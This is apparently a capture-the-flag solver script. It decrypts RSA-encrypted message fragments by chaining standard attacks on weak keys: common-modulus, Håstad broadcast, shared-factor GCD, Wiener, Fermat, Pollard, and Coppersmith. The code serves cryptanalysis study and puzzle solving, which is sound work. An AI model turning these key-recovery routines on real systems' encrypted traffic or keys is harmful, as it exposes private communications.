def parse_plaintext(m: mpz) -> tuple[int, int, str]:
    text_val = int(m & ((1 << 64) - 1))
    text_bytes = text_val.to_bytes(8, 'big').replace(b'\x00', b'')
    text = text_bytes.decode('ascii')
    seq_val = int((m >> 416) & ((1 << 32) - 1))
    flag_val = int((m >> 448) & ((1 << 64) - 1))
    return flag_val, seq_val, text


def solve_coppersmith(frame: Frame, known_high_bits_val: int, unknown_bits: int = 64) -> int:
    n, e, c, k = int(frame.n), int(frame.e), int(
        frame.c), int(known_high_bits_val)
    P = PolynomialRing(Zmod(n), names='x')
    x = P.gen()
    f = (k + x)**e - c
    f = f.monic()
    roots = f.small_roots(X=2**unknown_bits, beta=1.0)
    if roots:
        return int(roots[0])
    return None


def solve_hastad(frames: list[Frame]) -> mpz:
    e = frames[0].e
    n_list = [f.n for f in frames]
    c_list = [f.c for f in frames]
    M = mpz(1)
    for n in n_list:
        M *= n
    result = mpz(0)
    for i in range(len(frames)):
        Mi = M // n_list[i]
        yi = invert(Mi, n_list[i])
        result = (result + c_list[i] * Mi * yi) % M
    m, exact = iroot(result, e)
    return m if exact else None


def pollard_pm1(n: mpz, B: int = 200000) -> mpz:
    a = mpz(2)
    for i in range(2, B):
        a = powmod(a, i, n)
        d = gcd(a - 1, n)
        if 1 < d < n:
            return d
    return None


def pollard_rho(n: mpz, c_start: int = 1) -> mpz:
    if is_prime(n):
        return None
    x = mpz(2)
    y = x
    c = mpz(c_start)
    g = mpz(1)
    count = 0
    while g == 1:
        x = (x * x + c) % n
        y = (y * y + c) % n
        y = (y * y + c) % n
        g = gcd(abs(x - y), n)
        count += 1
        if count > 2000000:
            break
        if g == n:
            if c_start > 10:
                return None
            return pollard_rho(n, c_start + 1)
    if g == n or g == 1:
        return None
    return g


def fermat_factor(n: mpz, limit: int = 100000) -> tuple[mpz, mpz]:
    res = iroot(n, 2)
    a = res[0] + (1 if res[0]*res[0] < n else 0)
    for _ in range(limit):
        val = a * a - n
        if val >= 0:
            res2 = iroot(val, 2)
            if res2[1]:
                return a - res2[0], a + res2[0]
        a += 1
    return None, None


def wiener_attack(frame: Frame) -> tuple[int, str, mpz, mpz]:
    set_int_max_str_digits(100000)
    n, e = frame.n, frame.e
    cf_expansion = []
    n_val, d_val = e, n
    while d_val != 0:
        q = n_val // d_val
        cf_expansion.append(q)
        n_val, d_val = d_val, n_val % d_val

    p0, p1 = mpz(0), mpz(1)
    q0, q1 = mpz(1), mpz(0)

    for q_coeff in cf_expansion:
        pn = q_coeff * p1 + p0
        qn = q_coeff * q1 + q0
        p0, p1 = p1, pn
        q0, q1 = q1, qn

        k, d = pn, qn
        if k == 0:
            continue
        if (e * d - 1) % k != 0:
            continue
        phi = (e * d - 1) // k

        b = n - phi + 1
        delta = b*b - 4*n
        if delta >= 0:
            res = iroot(delta, 2)
            if res[1]:
                x1 = (b - res[0]) // 2
                x2 = (b + res[0]) // 2
                if x1 * x2 == n:
                    return frame.idx, 'Wiener', x1, x2
    return frame.idx, None, None, None


def attempt_factorization(frame: Frame) -> tuple[int, str, mpz, mpz]:
    idx, method, p, q = wiener_attack(frame)
    if method:
        print(f"    Frame {frame.idx} N factored by Wiener")
        return idx, method, p, q

    p, q = fermat_factor(frame.n)
    if p:
        print(f"    Frame {frame.idx} N factored by Fermat")
        return frame.idx, 'Fermat', p, q

    p = pollard_pm1(frame.n)
    if p:
        print(f"    Frame {frame.idx} N factored by Pollard p-1")
        return frame.idx, 'Pollard p-1', p, frame.n // p

    p = pollard_rho(frame.n, c_start=1)
    if p:
        print(f"    Frame {frame.idx} N factored by Pollard Rho")
        return frame.idx, 'Pollard Rho', p, frame.n // p
    return frame.idx, None, None, None


frames = load_frames()
solved = {}

print("\n[1] Common Modulus Attack...")
n_map = defaultdict(list)
for f in frames:
    n_map[f.n].append(f)
for n, group in n_map.items():
    if len(group) > 1:
        def egcd(a, b):
            if a == 0:
                return b, 0, 1
            g, y, x = egcd(b % a, a)
            return g, x - (b // a) * y, y
        g, u, v = egcd(group[0].e, group[1].e)
        if g == 1:
            c1 = invert(group[0].c, group[0].n) if u < 0 else group[0].c
            c2 = invert(group[1].c, group[1].n) if v < 0 else group[1].c
            m = (powmod(c1, abs(u), n) * powmod(c2, abs(v), n)) % n
            flag, seq, text = parse_plaintext(m)
            print(
                f"  Solved Frames {[f.idx for f in group]}: Seq {seq}, Text '{text}'")
            for f in group:
                solved[f.idx] = (seq, text)

print("\n[2] Broadcast Attack...")
e_map = defaultdict(list)
for f in frames:
    e_map[f.e].append(f)
for e, group in e_map.items():
    if e > 20 or len(group) < e:
        continue
    print(f"  Checking e={e} with {len(group)} frames...")
    for subset in combinations(group, e):
        if all(f.idx in solved for f in subset):
            continue
        m = solve_hastad(subset)
        if m:
            flag, seq, text = parse_plaintext(m)
            print(
                f"  Solved Frames {[f.idx for f in subset]}: Seq {seq}, Text '{text}'")
            for f in subset:
                if f.idx not in solved:
                    solved[f.idx] = (seq, text)

print("\n[3] Factorization Attacks...")
for i in range(len(frames)):
    for j in range(i + 1, len(frames)):
        if frames[i].idx in solved and frames[j].idx in solved:
            continue
        g = gcd(frames[i].n, frames[j].n)
        if g > 1 and frames[i].n != frames[j].n:
            p = g
            for f in [frames[i], frames[j]]:
                if f.idx not in solved:
                    q = f.n // p
                    d = invert(f.e, (p-1)*(q-1))
                    m = powmod(f.c, d, f.n)
                    flag, seq, text = parse_plaintext(m)
                    print(
                        f"  Frame {f.idx} Solved (GCD with Frame {frames[j].idx if f == frames[i] else frames[i].idx}): Seq {seq}, Text '{text}'")
                    solved[f.idx] = (seq, text)

print("  Running Fermat & Pollard in parallel...")
tasks = [f for f in frames if f.idx not in solved]
with ProcessPoolExecutor() as executor:
    results = executor.map(attempt_factorization, tasks)
for idx, method, p, q in results:
    if method:
        f = next((fr for fr in frames if fr.idx == idx), None)
        if f:
            d = invert(f.e, (p-1)*(q-1))
            m = powmod(f.c, d, f.n)
            flag, seq, text = parse_plaintext(m)
            print(f"  Frame {idx} Solved ({method}): Seq {seq}, Text '{text}'")
            solved[idx] = (seq, text)

print("\n[4] Coppersmith Attack...")
for f in frames:
    if f.idx in solved or f.e > 3:
        continue
    print(f"  Attempting Frame {f.idx} (e={f.e})...")
    for seq_guess in range(21):
        K = (FLAG_VAL << 448) | (seq_guess << 416)
        root = solve_coppersmith(f, K)
        if root is not None:
            m = K | root
            if powmod(m, f.e, f.n) == f.c:
                flag, seq, text = parse_plaintext(m)
                print(f"    -> MATCH! Seq {seq}, Text '{text}'")
                solved[f.idx] = (seq, text)
                break

print("\n[5] Recover by context...")
context_solutions = {5: (12, "ation wi"), 9: (13, "ll take "), 13: (
    14, "you ever"), 14: (9, " you fro"), 17: (15, 'ywhere."')}
for idx, (seq, text) in context_solutions.items():
    if idx not in solved:
        f = next((fr for fr in frames if fr.idx == idx), None)
        if f:
            text_val = int.from_bytes(text.encode('ascii'), 'big')
            m = (FLAG_VAL << 448) | (seq << 416) | text_val
            if powmod(m, f.e, f.n) == f.c:
                print(
                    f"  Frame {idx} Solved (Context): Seq {seq}, Text '{text}'")
                solved[idx] = (seq, text)

print("\nResult:")
final_seqs = {seq: text for seq, text in solved.values()}
full_text = "".join([final_seqs[s] for s in sorted(final_seqs.keys())])
print(f"Full Message: {full_text}")
  1. 1
  2. 2
  3. 3
  4. 4
  5. ...
  6. 9